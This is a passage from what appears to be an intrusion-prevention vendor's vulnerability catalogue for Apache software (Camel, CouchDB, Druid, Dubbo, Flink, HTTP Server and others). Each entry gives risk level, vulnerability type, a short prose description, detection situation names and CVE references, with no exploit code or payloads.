There exists a denial of service vulnerability in the Apache HTTP Server byte-range filter. The vulnerability occurs during the handling of requests that include a byte-range value, when HTTP Server is configured to act as a proxy. This flaw can cause the excess consumption of memory resources. A remote attacker can exploit the vulnerability by sending specially crafted HTTP requests to the target server, potentially causing denial of service.

Situation:

HTTP_CSH-Apache-Byte-Range-Filter-Denial-Of-Service

References:

CVE-2005-2728
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2728

BID-14660
http://www.securityfocus.com/bid/14660

Apache-Camel-Filter-Bypass-CVE-2025-27636

About this vulnerability:

A vulnerability in Apache Camel

Risk:

High

First detected in:

sgpkg-ips-1848-5242

Last changed:

sgpkg-ips-1848-5242

Platform:

Generic

Software:

Apache Camel

Type:

Input Validation

Description:

A filter bypass in Apache Camel allows unauthenticated attackers to execute internal Camel methods via crafted HTTP headers. Specific conditions are required for this vulnerability to be present. Versions 4.10.0-4.10.1, 4.8.0-4.8.4, and 3.10.0-3.22.3 are affected.

Situation:

HTTP_CSH-Apache-Camel-Filter-Bypass-CVE-2025-27636

References:

CVE-2025-27636
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27636

Apache-Camel-Filter-Bypass-CVE-2025-29891

About this vulnerability:

A vulnerability in Apache Camel

Risk:

Moderate

First detected in:

sgpkg-ips-1849-5242

Last changed:

sgpkg-ips-1849-5242

Platform:

Generic

Software:

Apache Camel

Type:

Input Validation

Description:

A filter bypass in Apache Camel allows unauthenticated attackers to execute internal Camel methods via crafted HTTP URI parameters. Specific conditions are required for this vulnerability to be present. Versions 4.10.0-4.10.1, 4.8.0-4.8.4, and 3.10.0-3.22.3 are affected.

Situation:

HTTP_CRL-Apache-Camel-Filter-Bypass-CVE-2025-29891

References:

CVE-2025-29891
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-29891

Apache-Camel-XSLT-Component-Java-Code-Execution

About this vulnerability:

A vulnerability in Apache Software Foundation Camel

Risk:

High

First detected in:

sgpkg-ips-569-5211

Last changed:

sgpkg-ips-1734-5242

Platform:

Generic

Software:

Apache Camel; Apache ActiveMQ

Type:

Malfunction

Description:

A code execution vulnerability has been reported in Apache Camel. The vulnerability is due to an error in handling XSL stylesheets in the XSLT component. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted XML message to the vulnerable server. Successful exploitation could result in the execution of arbitrary Java code on the target system with the privileges of the server process.

Situation:

File-TextId_Apache-Camel-XSLT-Component-Java-Code-Execution

References:

CVE-2014-0003
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0003

BID-65902
http://www.securityfocus.com/bid/65902

OSVDB-103917
http://www.osvdb.org/103917

Apache-Camel-XSLT-Component-Xml-External-Entity

About this vulnerability:

A vulnerability in Apache Software Foundation Camel

Risk:

High

First detected in:

sgpkg-ips-570-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Camel; Apache ActiveMQ

Type:

Input Validation

Description:

An XML External Entity (XXE) vulnerability has been reported in Apache Camel. The vulnerability is due to an error in handling XSL stylesheets in the XSLT component. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted XML message to the vulnerable server. Successful exploitation could result in the disclosure of arbitrary files accessible to the server's context, server-side request forgery, and/or policy bypass.

Situation:

HTTP_CS-Xml-Dtd-External-Entity-Multiple-Vulnerabilities
File-TextId_Xml-Dtd-External-Entity-Multiple-Vulnerabilities

References:

CVE-2014-0002
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0002

BID-65901
http://www.securityfocus.com/bid/65901

OSVDB-103916
http://www.osvdb.org/103916

Apache-Cloudstack-Saml-Authentication-Bypass

About this vulnerability:

A vulnerability in Apache Software Foundation CloudStack

Risk:

Moderate

First detected in:

sgpkg-ips-1766-5242

Last changed:

sgpkg-ips-1766-5242

Platform:

Generic

Software:

Apache CloudStack

Type:

Malfunction

Description:

An authentication bypass injection vulnerability has been reported in Apache CloudStack. The vulnerability is due to missing validation of SAML signatures. A remote, unauthenticated attacker can exploit this vulnerability by sending a spoofed SAML response to the target server, with no signature and a known or guessed username. Successful exploitation would result in the attacker being authenticated as the SAML-enabled user account.

Situation:

HTTP_CRL-Apache-Cloudstack-Saml-Authentication-Bypass

References:

CVE-2024-41107
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-41107

Apache-Commons-Collections-Object-Deserialization-Code-Execution-Vulnerability

About this vulnerability:	A vulnerability in Apache commons-collections library
Risk:	High
First detected in:	sgpkg-ips-706-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Buffer Overflow
Description:	There is a remote code execution vulnerability in Apache commons-collection library, which is used by many Java applications. The vulnerability is related to the deserialization of Java objects. A remote attacker can exploit this vulnerability by connecting to a JRMI interface without authenticating.
Situation:	Shared_CS-Java-Rmi-Object-Deserialization-Code-Execution-2 Shared_CS-Java-Rmi-Object-Deserialization-Code-Execution Shared_CS-Java-Rmi-Usage

Apache-Commons-Fileupload-Parserequest-Denial-Of-Service

About this vulnerability:

A vulnerability in Apache Commons FileUpload

Risk:

High

First detected in:

sgpkg-ips-1633-5242

Last changed:

sgpkg-ips-1633-5242

Platform:

Generic

Software:

Apache Commons FileUpload

Type:

Input Validation

Description:

A denial of service vulnerability has been reported in Apache Commons FileUpload. This vulnerability is due to a failure to properly handle file upload requests with a large number of request parts. A remote attacker can exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in a denial of service on the target server.

Situation:

HTTP_CS-Apache-Commons-Fileupload-Parserequest-Denial-Of-Service

References:

CVE-2023-24998
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24998

Apache-Commons-Text-Remote-Code-Execution-CVE-2022-42889

About this vulnerability:

A vulnerability in Apache Commons Text

Risk:

High

First detected in:

sgpkg-ips-1517-5242

Last changed:

sgpkg-ips-1517-5242

Platform:

Generic

Software:

Apache Commons Text

Type:

Malfunction

Description:

A remote code execution vulnerability has been reported in Apache Commons Text library versions from 1.5 to 1.9.

Situation:

HTTP_CS-Apache-Commons-Text-Remote-Code-Execution-CVE-2022-42889
HTTP_CRL-Apache-Commons-Text-Remote-Code-Execution-CVE-2022-42889

References:

CVE-2022-42889
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42889

Apache-Continuum-Command-Injection

About this vulnerability:	An Apache Continuum Command Injection vulnerability
Risk:	High
First detected in:	sgpkg-ips-774-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Linux
Software:	Apache Continuum
Type:	Input Validation
Description:	A vulnerbility in Apache Continuum, versions 1.4.2 and before, which allows remote attackers to execute arbitrary commands by sending a crafted request to the installation.varValue parameter in saveInstallation.action.
Situation:	HTTP_CRL-Apache-Continuum-Command-Injection

Apache-Couchdb-Config-Command-Execution

About this vulnerability:

A vulnerability in Apache Software Foundation CouchDB

Risk:

Moderate

First detected in:

sgpkg-ips-1025-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Software Foundation CouchDB

Type:

Malfunction

Description:

Improper handling of configuration-related HTTP requests causes a command execution vulnerability in Apache CouchDB. A successful exploitation allows an attacker to execute arbitrary commands on the target system with the privileges of the CouchDB process.

Situation:

HTTP_CSU-Apache-Couchdb-Config-Command-Execution

References:

CVE-2017-12636
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12636

Apache-Couchdb-Config-Command-Execution-CVE-2018-8007

About this vulnerability:

A vulnerability in Apache Software Foundation Couchdb

Risk:

Moderate

First detected in:

sgpkg-ips-1088-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Software Foundation CouchDB

Type:

Input Validation

Description:

Insufficient validation of configuration settings sent via the HTTP API causes a command execution vulnerability in Apache Couchdb. A successful expoit allows an attacker to remotely run arbitrary code on the target system.

Situation:

HTTP_CRL-Apache-Couchdb-Config-Command-Execution-CVE-2018-8007

References:

CVE-2018-8007
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8007

Apache-Couchdb-Erlang-RCE

About this vulnerability:

A vulnerability in Apache CouchDB.

Risk:

High

First detected in:

sgpkg-ips-1526-5242

Last changed:

sgpkg-ips-1825-5242

Platform:

Linux; Unix; Windows

Software:

Apache Software Foundation CouchDB

Type:

Input Validation

Description:

A vulnerability in Apache CouchDB, versions before 3.2.2, which allows remote attackers to access an improperly secured default installation without authenticating and gain admin privileges.

Situation:

Generic_CS-Apache-Couchdb-Erlang-RCE
Generic_CS-Potential-Apache-Couchdb-Erlang-RCE

References:

CVE-2022-24706
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24706

Apache-Couchdb-JSON-Remote-Privilege-Escalation

About this vulnerability:

A vulnerability in Apache Software Foundation CouchDB

Risk:

Moderate

First detected in:

sgpkg-ips-1021-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Software Foundation CouchDB

Type:

Malfunction

Description:

Improper handling of client-sent JSON objects causes a privilege escalation vulnerability in Apache CouchDB. A successful exploit allows access to the database.

Situation:

HTTP_CS-Apache-Couchdb-JSON-Remote-Privilege-Escalation

References:

CVE-2017-12635
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12635

BID-101868
http://www.securityfocus.com/bid/101868

Apache-Cxf-Services-Stylesheetpath-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Apache Software Foundation CXF

Risk:

Moderate

First detected in:

sgpkg-ips-1304-5242

Last changed:

sgpkg-ips-1304-5242

Platform:

Generic

Software:

Apache Software Foundation CXF

Type:

Input Validation

Description:

Improper sanitization of an URL parameter causes a cross-site scripting vulnerability in Apache CXF. A successful exploitation can allow an attacker to run arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-Apache-Cxf-Services-Stylesheetpath-Cross-Site-Scripting

References:

CVE-2020-13954
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13954

Apache-Druid-Javascriptdimfilter-Remote-Code-Execution

About this vulnerability:

A vulnerability in Apache Software Foundation Druid

Risk:

High

First detected in:

sgpkg-ips-1326-5242

Last changed:

sgpkg-ips-1326-5242

Platform:

Generic

Software:

Apache Druid

Type:

Input Validation

Description:

A remote code execution has been reported in Apache Druid. The vulnerability is due to improper deserialization of JSON data into java objects. A remote attacker could exploit this vulnerability by sending a crafted request with empty name in the JSON data to bind injected data with the java objects. Successful exploitation will allow an attacker to execute arbitrary code with the privileges of the running Druid server.

Situation:

HTTP_CRL-Apache-Druid-Javascriptdimfilter-Remote-Code-Execution

References:

CVE-2021-25646
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25646

Apache-Druid-JDBC-Connection-Properties-Remote-Code-Execution

About this vulnerability:

A vulnerability in Apache Software Foundation Druid

Risk:

Moderate

First detected in:

sgpkg-ips-1340-5242

Last changed:

sgpkg-ips-1340-5242

Platform:

Generic

Software:

Apache Druid

Type:

Input Validation

Description:

Insufficient validation of MySQL JDBC connection URL properties causes a deserialization vulnerability in Apache Druid. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

HTTP_CRL-Apache-Druid-JDBC-Connection-Properties-Remote-Code-Execution

References:

CVE-2021-26919
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26919

Apache-Druid-JNDI-Injection-RCE

About this vulnerability:

A vulnerability in Apache Druid detected

Risk:

High

First detected in:

sgpkg-ips-1625-5242

Last changed:

sgpkg-ips-1625-5242

Platform:

Generic

Software:

Apache Druid

Type:

Insecure Configuration

Description:

A vulnerability in Apache Druid, versions 2.3.0 to 3.3.2, which allows remote attackers to set the sasl.jaas.config property of any Kafka client to com.sun.security.auth.module.JndiLoginModule, which leads to the ability to execute java deserialization gadget chains on the Kafka connect server.

Situation:

HTTP_CRL-Apache-Druid-JNDI-Injection-RCE

References:

CVE-2023-25194
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25194

Apache-Dubbo-Httpremoteinvocation-Insecure-Deserialization

About this vulnerability:

A vulnerability in Apache Software Foundation Dubbo

Risk:

Moderate

First detected in:

sgpkg-ips-1242-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Dubbo

Type:

Input Validation

Description:

Insecure deserialization of remotely sent payloads causes a vulnerability in Apache Dubbo. A successful exploit may allow an attacker to execute arbitrary code on the target system.

Situation:

File-Binary_Apache-Dubbo-Httpremoteinvocation-Insecure-Deserialization

References:

CVE-2019-17564
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17564

Apache-Dubbo-Routing-Configuration-Unsafe-YAML-Unmarshalling

About this vulnerability:

A vulnerability in Apache Software Foundation Dubbo

Risk:

High

First detected in:

sgpkg-ips-1366-5242

Last changed:

sgpkg-ips-1366-5242

Platform:

Generic

Software:

Apache Dubbo

Type:

Input Validation

Description:

A remote code execution vulnerability has been reported in Apache Dubbo. The vulnerability is due to unsafe YAML unmarshalling. An unauthenticated, remote attacker can exploit these vulnerability by enticing an Apache Dubbo Consumer or Producer to connect to a malicious Registry. Successful exploitation can result in the execution of arbitrary code under the security context of the Dubbo server.

Situation:

Generic_TCP-Apache-Dubbo-Routing-Configuration-Unsafe-YAML-Unmarshalling

References:

CVE-2021-30180
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30180

Apache-Dubbo-Script-Routing-Remote-Code-Execution

About this vulnerability:

A vulnerability in Apache Software Foundation Dubbo

Risk:

Moderate

First detected in:

sgpkg-ips-1359-5242

Last changed:

sgpkg-ips-1359-5242

Platform:

Generic

Software:

Apache Dubbo

Type:

Malfunction

Description:

A remote code execution exists in the Script routing component of Apache Dubbo. The vulnerability is due to an unsandboxed script execution while processing a Script Routing rule. A remote attacker can exploit this vulnerability by enticing an Apache Dubbo Consumer to connect to a malicious Registry. Successful exploitation can result in arbitrary code execution under the security context of the affected Consumer.

Situation:

Generic_TCP-Apache-Dubbo-Script-Routing-Remote-Code-Execution

References:

CVE-2021-30181
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30181

Apache-Fineract-Imagesapiresource-Arbitrary-File-Upload

About this vulnerability:

A vulnerability in Apache Software Foundation Fineract

Risk:

Moderate

First detected in:

sgpkg-ips-1554-5242

Last changed:

sgpkg-ips-1554-5242

Platform:

Generic

Software:

Apache Software Foundation Fineract

Type:

Input Validation

Description:

A directory traversal vulnerability has been reported in Apache Fineract. The vulnerability is due to insufficient sanitation of paths during file uploads. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could lead to code execution in the context of the server process.

Situation:

HTTP_CSH-Apache-Fineract-Imagesapiresource-Arbitrary-File-Upload

References:

CVE-2022-44635
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-44635

Apache-Flink-CVE-2020-17519

About this vulnerability:

A vulnerability in Apache Flink

Risk:

High

First detected in:

sgpkg-ips-1313-5242

Last changed:

sgpkg-ips-1313-5242

Platform:

Generic

Software:

Apache Flink

Type:

Directory Traversal

Description:

There has been reported a path traversal vulnerability in Apache Flink versions 1.11.0, 1.11.1, and 1.11.2. Successful exploitation may allow attackers to read files on the local filesystem of the JobManager through the JobManager REST API.

Situation:

HTTP_CRL-Apache-Flink-CVE-2020-17519

References:

CVE-2020-17519
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17519

Apache-Flink-FileUploadHandler-Arbitrary-File-Upload

About this vulnerability:

A vulnerability in Apache Flink

Risk:

High

First detected in:

sgpkg-ips-1324-5242

Last changed:

sgpkg-ips-1324-5242

Platform:

Generic

Software:

Apache Flink

Type:

Directory Traversal

Description:

There exists a vulnerability in Apache Flink, versions 1.11.0 to 1.11.2, that allows remote attackers to execute arbitrary code due to the insufficient validation of user input when uploading files in the FileUploadHandler class.

Situation:

HTTP_CS_Apache-Flink-FileUploadHandler-Arbitrary-File-Upload

References:

CVE-2020-17518
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17518

Apache-Flink-JAR-Upload-Java-Code-Execution

About this vulnerability:	A vulnerability in Apache Flink.
Risk:	High
First detected in:	sgpkg-ips-1368-5242
Last changed:	sgpkg-ips-1368-5242
Platform:	Linux; Windows
Software:	Apache Flink
Type:	Insecure Configuration
Description:	A vulnerability in Apache Flink which allows remote unauthenticated attackers to upload and execute arbitrary JAR files, leading to remote Java code execution.
Situation:	HTTP_CRL-Apache-Flink-JAR-Upload-Java-Code-Execution

Apache-HTTP-Server-Illegal-Character-File-Disclosure

About this vulnerability:

File disclosure vulnerability in Apache

Risk:

Moderate

First detected in:

sgpkg-ips-17-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Apache

Type:

Malfunction

Description:

Apache HTTP Server versions 2.0.43 and earlier running on Microsoft Windows systems could allow a remote attacker to bypass default script mapping rules and obtain restricted files. A remote attacker could send a specially-crafted URL request for a known CGI or PHP script appended with illegal characters, which would allow the attacker to bypass script mapping rules and obtain the targeted file.

Situation:

HTTP_CSU-Apache-HTTP-Server-Illegal-Character-File-Disclosure

References:

CVE-2003-0017
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0017

BID-6660
http://www.securityfocus.com/bid/6660

OSVDB-9710
http://www.osvdb.org/9710

Apache-HTTP-Server-Mod-Cache-Module-Denial-Of-Service

About this vulnerability:

Null-dereference vulnerability in the mod_cache module in Apache HTTP Server

Risk:

Low

First detected in:

sgpkg-ips-114-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache

Type:

Malfunction

Description:

There is a null-dereference vulnerability in the mod_cache module in Apache HTTP Server. By sending a malformed HTTP request to the affected server that has the mod_cache parsing enabled, a remote attacker can cause a denial of service condition.

Situation:

HTTP_CSH-Apache-HTTP-Server-Mod-Cache-Module-Denial-Of-Service

References:

CVE-2007-1863
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1863

BID-24649
http://www.securityfocus.com/bid/24649

OSVDB-37079
http://www.osvdb.org/37079

Apache-HTTP-Server-Mod-Dav-Merge-Request-Denial-Of-Service

About this vulnerability:

A vulnerability in Apache Software Foundation HTTP Server

Risk:

High

First detected in:

sgpkg-ips-535-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache

Type:

Malfunction

Description:

A denial of service vulnerability has been reported in the mod_dav component of Apache HTTP Server. The vulnerability is due to a NULL pointer dereference when processing a MERGE request with a URI whose source href points to a non-DAV configured URI. A remote attacker can send a crafted HTTP request to trigger the vulnerability and cause the HTTP server daemon process to segfault, creating a denial of service condition.

Situation:

HTTP_CS-Apache-HTTP-Server-Mod-Dav-Merge-Request-Denial-Of-Service

References:

CVE-2013-1896
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1896

OSVDB-95498
http://www.osvdb.org/95498

Apache-HTTP-Server-Mod-Negotiation-Filename-Handling-Cross-Site-Scripting

About this vulnerability:

A cross-site scripting vulnerability in Apache HTTP Server

Risk:

Moderate

First detected in:

sgpkg-ips-250-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache

Type:

Malfunction

Description:

There is a cross-site scripting vulnerability in Apache HTTP Server. The vulnerability is due to insufficient validation of user-supplied input data in the mod_negotiation module. The flaw may be exploited by malicious users to execute arbitrary HTML code in the target user's web browser in the context of a trusted web site.

Situation:

HTTP_CSU-Apache-HTTP-Server-Mod-Negotiation-Filename-Handling-XSS

References:

CVE-2008-0455
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0455

BID-27409
http://www.securityfocus.com/bid/27409

Apache-HTTP-Server-Mod_Cache-Denial-Of-Service

About this vulnerability:

A vulnerability in Apache Software Foundation HTTP Server

Risk:

Moderate

First detected in:

sgpkg-ips-602-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache

Type:

Malfunction

Description:

A denial of service vulnerability exists in Apache HTTP server. The vulnerability is due to a NULL pointer dereference in the cache_invalidate() in mod_cache module. A remote unauthenticated attacker can leverage this vulnerability by sending a malicious response to the target server. Successful exploitation would result in a denial of service condition on the target.

Situation:

HTTP_SHS-Apache-HTTP-Server-Mod_Cache-Denial-Of-Service

References:

CVE-2013-4352
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4352

BID-68863
http://www.securityfocus.com/bid/68863

OSVDB-109233
http://www.osvdb.org/109233

Apache-HTTP-Server-Mod_Deflate-Denial-Of-Service

About this vulnerability:

A vulnerability in Apache Software Foundation HTTP Server

Risk:

High

First detected in:

sgpkg-ips-609-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache

Type:

Resource Starvation

Description:

A denial of service vulnerability exists in Apache HTTP server. The vulnerability exists in the mod_deflate module and is due to a resource exhaustion that is related to request body decompression configuration. A remote, unauthenticated attacker can leverage this vulnerability by sending a malicious request to the target server. Successful exploitation would exhaust available memory, CPU and file-system resources to cause a denial of service condition on the target.

Situation:

HTTP_Decompression-Ratio-Large

References:

CVE-2014-0118
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0118

BID-68745
http://www.securityfocus.com/bid/68745

OSVDB-109231
http://www.osvdb.org/109231

Apache-HTTP-Server-Mod_log_Config-Denial-Of-Service

About this vulnerability:

A vulnerability in Apache Software Foundation HTTP Server

Risk:

Moderate

First detected in:

sgpkg-ips-573-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache

Type:

Malfunction

Description:

A denial of service vulnerability exists in Apache HTTP server. The vulnerability is due to a log processing error in the mod_log_config module when cookies are logged, that can result in the crash of worker threads. This vulnerability only affects servers that are logging cookies and are using a threaded MPM (the default on Linux and Windows). A remote, unauthenticated attacker can leverage this vulnerability by sending a malicious request to the target server. Successful exploitation would result in a denial of service condition on the target.

Situation:

HTTP_CSH-Apache-HTTP-Server-Mod_log_Config-Denial-Of-Service
HTTP_CSH-Apache-HTTP-Server-Mod_log_Config-Denial-Of-Service-2

References:

CVE-2014-0098
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0098

BID-66303
http://www.securityfocus.com/bid/66303

OSVDB-104580
http://www.osvdb.org/104580

Apache-HTTP-Server-Mod_Proxy-Denial-Of-Service

About this vulnerability:

A vulnerability in Apache Software Foundation HTTP Server

Risk:

Moderate

First detected in:

sgpkg-ips-600-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache

Type:

Resource Starvation

Description:

A denial of service vulnerability exists in Apache HTTP server. The vulnerability exists in the mod_proxy module and is due to an error handling malformed HTTP headers. A remote, unauthenticated attacker can leverage this vulnerability by sending a malicious request to the target server. Successful exploitation would result in a denial of service condition on the target.

Situation:

HTTP_CSH-Apache-HTTP-Server-Mod_Proxy-Denial-Of-Service

References:

CVE-2014-0117
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0117

OSVDB-109232
http://www.osvdb.org/109232

Apache-HTTP-Server-Mod_Proxy_FTP-Wildcard-Characters-XSS

About this vulnerability:

A vulnerability in Apache Software Foundation HTTP Server

Risk:

High

First detected in:

sgpkg-ips-378-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache

Type:

Malfunction

Description:

There exist a cross-site scripting vulnerability in Apache mod_proxy_ftp module.

Situation:

HTTP_CSU-Apache-HTTP-Server-Mod_Proxy_FTP-Wildcard-Characters-XSS

References:

CVE-2008-2939
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2939

BID-30560
http://www.securityfocus.com/bid/30560

Apache-HTTP-Server-Mod_Rewrite-Rewritelog-Command-Execution

About this vulnerability:

A vulnerability in Apache Software Foundation HTTP Server

Risk:

High

First detected in:

sgpkg-ips-539-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache

Type:

Input Validation

Description:

A command execution vulnerability exists in Apache HTTP web server mod_rewrite. The vulnerability is due to a lack of input validation in handling certain escape sequences when writing to the log file. A remote attacker can exploit these vulnerabilities by sending a specially crafted HTTP request. Successful exploitation could result in attacker controlled script command executing.

Situation:

HTTP_CSU-Apache-HTTP-Server-Mod_Rewrite-Rewritelog-Command-Execution

References:

CVE-2013-1862
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1862

BID-64758
http://www.securityfocus.com/bid/64758

OSVDB-93366
http://www.osvdb.org/93366

Apache-HTTP-Server-Mod_rpaf-X-Forwarded-For-Denial-Of-Service

About this vulnerability:

A vulnerability in Apache Software Foundation HTTP Server

Risk:

Moderate

First detected in:

sgpkg-ips-485-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache

Type:

Input Validation

Description:

There is a denial of service vulnerability in the mod_rpaf module of Apache's HTTP Server. The vulnerability is caused by an error when processing certain HTTP headers. An unauthenticated, remote attacker can exploit this vulnerability by sending HTTP requests with malicious X-Forwarded-for headers to a target. This could lead to a segmentation fault resulting in a denial of service condition.

Situation:

HTTP_CSH-Apache-HTTP-Server-Mod_rpaf-X-Forwarded-For-Denial-Of-Service

References:

CVE-2012-3526
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3526

BID-55154
http://www.securityfocus.com/bid/55154

OSVDB-84911
http://www.osvdb.org/84911

Apache-HTTP-Server-Mod_status-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Apache Software Foundation HTTP Server (httpd)

Risk:

High

First detected in:

sgpkg-ips-626-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache

Type:

Race Condition

Description:

A heap buffer overflow vulnerability exists in Apache httpd. The vulnerability is due to a race condition in the mod_status module running on a server with threaded MPM. A remote unauthenticated attacker can exploit this vulnerability by sending specially crafted requests to the server status page. Successful exploit may result in information disclosure or code execution.

Situation:

HTTP_CSU-General-Server-Status-Client-URI
File-Text_General-Server-Status-Stream

References:

CVE-2014-0226
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0226

BID-68678
http://www.securityfocus.com/bid/68678

OSVDB-109216
http://www.osvdb.org/109216

Apache-HTTP-Server-Mod_tcl-Module-Format-String-Vulnerability

About this vulnerability:

A vulnerability in Apache Software Foundation mod_tcl Module

Risk:

Moderate

First detected in:

sgpkg-ips-413-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache

Type:

Format String

Description:

There exists a format string vulnerability in the mod_tcl module used with the Apache HTTP server. The vulnerability is due to the failure of the application in verifying string arguments that are passed to a formatting function, resulting in a memory corruption condition. A remote attacker can exploit this vulnerability to inject and execute arbitrary code with the privileges of the httpd process. In a simple attack exploiting this vulnerability, the httpd process serving the attacker terminates, closing the connection as a result. This might also reset other connections served by the affected httpd process, in the case the HTTP server is configured to run in multiple-threading mode. In the case of a more sophisticated attack, the injected arbitrary code is executed with the privileges of the httpd process. The behaviour of the target system will be dependent on the malicious code.

Situation:

HTTP_CS-Apache-HTTP-Server-Mod_tcl-Module-Format-String-Vulnerability

References:

CVE-2006-4154
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4154

BID-20527
http://www.securityfocus.com/bid/20527

OSVDB-29536
http://www.osvdb.org/29536

Apache-HTTP-Server-Msdos-Device-Name-DoS

About this vulnerability:

Denial of service vulnerability in Apache HTTP Server

Risk:

Low

First detected in:

sgpkg-ips-18-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 95; Windows 98; Windows ME

Software:

Apache

Type:

Malfunction

Description:

Apache HTTP Server is vulnerable to a Denial of Service (DoS) attack, caused by a vulnerability in the ap_directory_walk function. By sending an HTTP GET request for a DOS device name to the Web server, a remote attacker could cause the system to crash.

Situation:

HTTP_CSU-Apache-HTTP-Server-Path-Traversal-CVE-2021-41773

References:

CVE-2003-0016
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0016

BID-6662
http://www.securityfocus.com/bid/6662

OSVDB-9708
http://www.osvdb.org/9708

Apache-HTTP-Server-Path-Traversal-CVE-2021-41773

About this vulnerability:

A vulnerability in Apache HTTP Server

Risk:

High

First detected in:

sgpkg-ips-1393-5242

Last changed:

sgpkg-ips-1394-5242

Platform:

Generic

Software:

Apache

Type:

Directory Traversal

Description:

A path traversal vulnerability has been reported in Apache HTTP Server version 2.4.49. This situation covers also CVE-2021-42013.

Situation:

References:

CVE-2021-41773
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773

Apache-Httpd-Apr_FilePath_Merge-Ntlm-Relay

About this vulnerability:

A vulnerability in Apache Software Foundation HTTP Server

Risk:

Moderate

First detected in:

sgpkg-ips-1789-5242

Last changed:

sgpkg-ips-1789-5242

Platform:

Windows

Software:

Apache

Type:

Malfunction

Description:

Improper HTTP request path processing on Windows hosts causes an NTLM relay vulnerability in the Apache web server. A successful exploitation may lead to the disclosure of a reusable NTLM hash.

Situation:

HTTP_CSU-Apache-Httpd-Apr_FilePath_Merge-Ntlm-Relay

References:

CVE-2024-38472
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38472

Apache-Httpd-Ap_Find_Token-Out-Of-Bounds-Read

About this vulnerability:

A vulnerability in Apache Software Foundation HTTP Server

Risk:

Moderate

First detected in:

sgpkg-ips-956-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache

Type:

Malfunction

Description:

Improper handling of a malformed HTTP request header causes an out of bounds read vulnerability in the Apache HTTP server. Successful exploitation of the vulnerability causes a denial of service condition.

Situation:

HTTP_CSH-Apache-Httpd-Ap_Find_Token-Out-Of-Bounds-Read

References:

CVE-2017-7668
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7668

Apache-Httpd-Error-Code-400-Httponly-Cookie-Handling-Information-Disclosure

About this vulnerability:

A vulnerability in Apache Software Foundation HTTP Server

Risk:

